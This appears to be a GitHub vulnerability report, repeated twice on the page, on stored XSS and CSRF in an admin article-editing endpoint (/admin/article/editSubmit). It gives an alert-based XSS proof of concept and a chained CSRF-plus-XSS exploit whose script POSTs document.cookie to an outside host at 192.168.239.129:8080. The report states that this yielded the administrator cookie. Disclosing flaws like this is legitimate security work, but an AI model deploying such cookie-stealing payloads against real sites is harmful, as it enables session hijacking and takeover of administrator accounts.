You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
interface: /admin/article/editSubmit
CSRF POC: generated by burpsuite
Combining two vulnerabilities
Change the articleContent parameter content to XSS EXP
XSS EXP: <script>fetch('http://192.168.239.129:8080', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>
View or edit this article
Got the administrator cookie
Stored XSS in the administrator backend article editing
interface:
/admin/article/editSubmitXSS POC:
<img src=1 onerror=alert(document.cookie)>CSRF in the administrator backend article editing
interface:
/admin/article/editSubmitCSRF POC: generated by burpsuite
Combining two vulnerabilities
Change the articleContent parameter content to XSS EXP
XSS EXP:
<script>fetch('http://192.168.239.129:8080', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>View or edit this article
Got the administrator cookie